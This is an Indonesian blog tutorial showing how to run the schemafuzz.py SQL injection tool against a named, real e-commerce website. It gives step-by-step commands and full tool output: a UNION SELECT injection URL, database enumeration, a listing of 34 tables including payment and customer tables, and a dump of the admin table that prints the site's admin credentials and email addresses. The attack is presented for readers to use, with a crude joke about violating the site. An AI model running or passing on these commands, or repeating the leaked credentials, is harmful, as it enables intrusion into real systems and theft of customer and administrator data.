Rabu, 03 Agustus 2011

Tutorial Python27

ini adalah kelanjutan dari Tool SQL injection dan Python dan disini kita akan bahas penggunaan python27+scripts ok!
Sebelumnya sudah punya python belum kalo belum silahkan download disitus resminya disini
ok langsung sipakan pelaralatan tempur:
1. minuman
2. cemilan
3. rokok bagi yg merokok
4. kelamaan gan heee.. :D
setelah agan selesai menginstal python, kemudian scripts schemafuzz.py di copy dan di paste di folder python27.
Proses pengoprasian:
1. buka command prompt
2. kemudian masuk ke folder pyhton27 berada, ketik cmd sbb: cd c:\pyhton27 [enter]
3. ok sdh masuk...C:\Python27>
4. lanjutkan menuliskan perintah, cmd sbb: C:\Python27>schemafuzz.py -u "url(site)" --findcol [enter]. contoh C:\Python27> schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4 --findcol [enter]
maka akan muncul seperti ini:
|---------------------------------------------------------------|
| assasin666[@]2di4[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help Blackhat|
|---------------------------------------------------------------|

[+] URL:http://www.merchandisingf1.com/en/news.php?id=4--
[+] Evasion Used: "+" "--"
[+] 15:58:10
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,8,
[+] Column Length is: 9
[+] Found null column at column #: 3
[+] SQLi URL: http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--
[+] dimensi URL: http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8
[-] Done!

nah dalam yg satu ini kita gunakan yg ini: http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 yg siap kita injeksi

5. sekarang kita mencari databasenya dgn perintah sbb: C:\Pyhton27>schemafuzz.py -u "url(site)" --dbs. contoh: C:\Pyhton27>schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 --dbs [enter]
nah seharusnya muncul seperti demikian:
|---------------------------------------------------------------|
| assasin666[@]2di4[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help Blackhat|
|---------------------------------------------------------------|

[+] URL:http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 16:01:33
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: merchand_main
User: merchand_userm@localhost
Version: 5.1.47
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0] merchand_main
[1] test

[-] [16:02:34]
[-] Total URL Requests 4
[-] Done

6. hemmm..sdh kelihatan databasenya kan...ok gan lanjut ke step selanjutnya mencari nama table dalam database, perintah cmd sbb: C:\Pyhton27>schemafuzz.py -u "url(site)" --schema -D database name, contoh: C:\Python27>schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 --schema -D merchand_main [enter], maka muncul seperti demikian:
|---------------------------------------------------------------|
| assasin666[@]2di4[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help Blackhat|
|---------------------------------------------------------------|

[+] URL:http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 16:09:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: merchand_main
User: merchand_userm@localhost
Version: 5.1.47
[+] Showing Tables & Columns from database "merchand_main"
[+] Number of Tables: 34

[Database]: merchand_main
[Table: Columns]
[0]bankpass: id,NUMORD,IDNEGOZIO,AUT,IMPORTO,VALUTA,IDTRANS,MAC,ESITO,TAUTOR,TCONTAB,CARTA
[1]cataloghi: cata_id,cata_titolo,cata_titolo_en,cata_file,cata_posizione
[2]categorie: cat_id,cat_nome,cat_nome_en,cat_tipo,cat_ordine,cat_url,cat_titlepage,cat_titlepage_en,cat_vis
[3]clienti: cl_id,cl_codice,cl_classe,cl_ragsoc,cl_cognome,cl_nome,cl_sede_ind,cl_sede_citta,cl_sede_prov,cl_sede_cap,cl_nazione,cl_tel,cl_fax,cl_piva,cl_email,cl_url,cl_contatto,cl_sped_ind,cl_sped_citta,cl_sped_prov,cl_sped_cap,cl_privacy,cl_vis_cond,cl_acc_cond,cl_optin,cl_login,cl_password,cl_permessi
[4]comuni: IDCOMUNE,COMUNE,IDPRO,CAP,SUFFISSO,CATASTALE
[5]corrieri: corr_id,corr_nome,corr_tel,corr_url
[6]dettordini: do_id,do_ord_id,do_prod_id,do_cat_id,do_nome,do_colore,do_taglia,do_qta,do_pr,do_pr_tot
[7]doblone: dob_id,dob_file,dob_cat,dob_pos
[8]links: lin_id,lin_cat_id,lin_url,lin_title_it,lin_title_en,lin_text_it,lin_text_en,lin_stat,lin_ordine
[9]links_cat: lincat_id,lincat_title_it,lincat_title_en,lincat_order
[10]mll_categories_ctg: id_ctg,name_ctg,visible_ctg
[11]mll_categrecip_crp: id_crp,idctg_crp,idrcp_crp
[12]mll_lock_lck: id_lck,timestamp_lck
[13]mll_mailhistory_mhi: id_mhi,idmal_mhi,idsbd_mhi,sentdate_mhi
[14]mll_mailing_mal: id_mal,idrcp_mal,idtem_mal,idmst_mal,name_mal,creationdate_mal,sender_mal,replyto_mal,subject_mal,sendbcc_mal,sentno_mal,hit_mal,attname_mal,atttype_mal,usermessagehtml_mal,usermessagetext_mal,lock_mal,lockdate_mal
[15]mll_mailingstatus_mst: id_mst,name_mst,default_mst
[16]mll_mailque_mqu: id_mqu,idmal_mqu,idsbd_mqu,idtst_mqu,sent_mqu,sentdate_mqu,random_mqu
[17]mll_readmails_rem: id_rem,idsbd_rem,idmal_rem,readdate_rem
[18]mll_recipients_rcp: id_rcp,name_rcp
[19]mll_subscrcateg_sct: id_sct,idsbd_sct,idctg_sct
[20]mll_subscribed_sbd: id_sbd,firstname_sbd,lastname_sbd,email_sbd,adress_sbd,mailtype_sbd,active_sbd,password_sbd,failed_sbd,privacy
[21]mll_templates_tem: id_tem,idtst_tem,name_tem,subject_tem,sourcehtml_tem,sourcetext_tem,active_tem
[22]mll_templstatus_tst: id_tst,name_tst,default_tst
[23]mll_users_usr: id_usr,username_usr,password_usr,admin_usr,email_usr,testmail_usr,sender_usr,replyto_usr
[24]modulo: mod_id,mod_titolo,mod_titolo_en,mod_testo,mod_testo_en,mod_file
[25]news: news_id,news_data,news_titolo,news_titolo_en,news_abstract,news_abstract_en,news_testo,news_testo_en,news_immagine
[26]opzioni: opz_id,opz_nome,opz_nome_eng,opz_ordine
[27]opzioni_prod: opzprod_id,opzprod_opz_id,opzprod_prod_id
[28]ordini: ord_id,ord_cl_id,ord_data,ord_spese,ord_totale,ord_IVA,ord_totale_IVA,ord_pr_trasp,ord_note,ord_stato,ord_corr_id,ord_track_n,ord_data_sped,ord_payment,NUMORD
[29]paypal_txns: id,txn_id,item_name,item_number,payment_status,payment_amount,payment_currency,receiver_email,payer_email
[30]prodotti: prod_id,prod_cat_id,prod_codice,prod_nome,prod_nome_en,prod_descr,prod_descr_en,prod_colore,prod_colore_en,prod_prezzo_p,prod_prezzo_r,prod_disponib,prod_foto_fr,prod_foto_re,prod_det1,prod_det2,prod_det3,prod_taglia_xs,prod_taglia_s,prod_taglia_m,prod_taglia_l,prod_taglia_xl,prod_taglia_xxl,prod_prior
[31]sella_txns: id,id_ordine,esito,data
[32]statord: st_id,st_stato,st_stato_en,st_note
[33]trasporto: tras_id,tras_tipo_it,tras_tipo_en,tras_prezzo,tras_cat,tras_add

[-] [16:40:00]
[-] Total URL Requests 257
[-] Done

7.nah tuh banyak yg keliatan agan perkosa aja gih biar ketahuan heee :P , ok langsung saja yg terakhir dgn perintah cmd sbb: C:\Pyhton27>schemafuzz.py -u "url(site)" --dump -D database name -T table -C kolom [enter], contoh: C:\Pyhton27>schemafuzz.py -u http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8 --dump -D database name -T mll_users_usr -C id_usr,username_usr,password_usr,admin_usr,email_usr,testmail_usr,sender_usr,replyto_usr [enter] nah maka nampak seperti ini:
|---------------------------------------------------------------|
| assasin666[@]2di4[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help Blackhat|
|---------------------------------------------------------------|

[+] URL:http://www.merchandisingf1.com/en/news.php?id=4+AND+1=2+UNION+SELECT+0,1,2,dimensi,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 16:47:35
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: merchand_main
User: merchand_userm@localhost
Version: 5.1.47
[+] Dumping data from database "merchand_main" Table "mll_users_usr"
[+] Column(s) ['id_usr', 'username_usr', 'password_usr', 'admin_usr', 'email_usr', 'testmail_usr', 'sender_usr', 'replyto_usr']
[+] Number of Rows: 1

[0] 1:admin:admin:9:info@merchandisingf1.com:cera@fcea.it:newsletter@merchandisingf1.com:newsletter@merchandisingf1.com:

ok gan cukup sekian penjelasan dari kami, gunakanlah dengan bijak dan Cyberzoid tidak bertanggung jawab bila nanti agan jadi jahat :p
Diposting oleh choice di 06.40

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)